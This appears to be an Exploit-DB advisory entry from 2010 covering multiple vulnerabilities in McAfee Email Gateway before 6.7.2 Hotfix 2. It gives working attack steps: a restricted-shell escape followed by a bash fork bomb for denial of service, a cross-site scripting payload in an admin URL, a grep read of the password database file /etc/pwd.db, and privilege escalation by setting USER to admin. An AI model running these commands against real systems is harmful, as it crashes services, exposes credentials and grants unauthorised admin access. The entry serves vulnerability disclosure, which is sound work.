McAfee Email Gateway < 6.7.2 Hotfix 2 - Multiple Vulnerabilities

2010-04-06T00:00:00
ID EDB-ID:33819
Type exploitdb
Reporter Nahuel Grisolia
Modified 2010-04-06T00:00:00

Description

McAfee Email Gateway Prior To 6.7.2 Hotfix 2 Multiple Vulnerabilities. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/39242/info

McAfee Email Gateway (formerly IronMail) is prone to multiple vulnerabilities, including:

A local privilege-escalation vulnerability
A denial-of-service vulnerability.
Multiple cross-site scripting vulnerabilities
An information-disclosure vulnerability

An attacker may leverage these issues to completely compromise affected computers, execute arbitrary commands and script code, steal cookie-based authentication credentials, crash the affected application and gain access to sensitive information. Other attacks are also possible.

Versions prior to McAfee Email Gateway 6.7.2 Hotfix 2 are vulnerable. 


Denial of Service:

* In order to run the DoS, follow the steps below:
[Secure Mail]: command rbash –noprofile
[Secure Mail]: :(){:|:&};:

Cross-site scripting 

https://www.example.com/admin/queuedMessage.do?method=getQueueMessages&queueMsgType=<script>alert("XSS");</script>&QtnType=9

Information Disclosure

[Secure Mail]: command rbash –noprofile
[Secure Mail]: grep -a '.*' /etc/pwd.db

Local Privilege-Escalation: 

[Secure Mail]: command rbash –noprofile
[Secure Mail]: declare -x USER="admin"
If you want to check the new privilege:
[Secure Mail]: cmd_admin set user unlock
*** Invalid command: Usage - set user unlock <USER ID> ***
[Secure Mail]: cmd_admin set user unlock admin
Cannot unlock yourself.
[Secure Mail]: exi